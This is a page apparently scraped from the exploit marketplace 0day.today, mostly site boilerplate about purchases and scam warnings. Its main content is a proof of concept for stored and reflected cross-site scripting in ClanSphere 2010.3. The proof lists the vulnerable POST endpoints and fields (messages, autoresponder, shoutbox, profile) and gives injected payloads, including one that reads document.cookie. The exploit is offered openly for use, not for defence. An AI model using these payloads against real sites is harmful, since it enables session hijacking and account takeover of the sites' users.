0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ClanSphere 2010.3 Xss Vulnerability
# author: lemlajt # software : Clansphere @ sourceforge.net # version: 2010_3 # tested on: linux # cve : # xss-01 PoC : POST http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=create $messages_subject=<body onload=alert('yo')> xss-02 Stored PoC: a. post http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=autoresponder $autoresponder_subject=">">body onload=alert(document.cookie)> $autoresponder_text=">could.be.here.2> b. 'Preview'. c. enjoy Better: This is stored xss: We see this message in our mailbox, and there is "><script>bla... in let's say: 'clear text'. So we decide to delete this 3v1l msg from our mail's! --> [remove] and this is it, stored xss is here;] output src: <td class="leftb">Really delete message <strong>"><body onload=alert('yo')></strong> ?</td> ;] btw: stored xss is also when you add "><script>tag</script> to few inputs in user profile. then save it, and go to edit again. and here you have another xss. * bonus: index.php?mod=shoutbox&action=create ( put "><script>) $sh_nick $sh_text2 # 0day.today [2024-11-16] #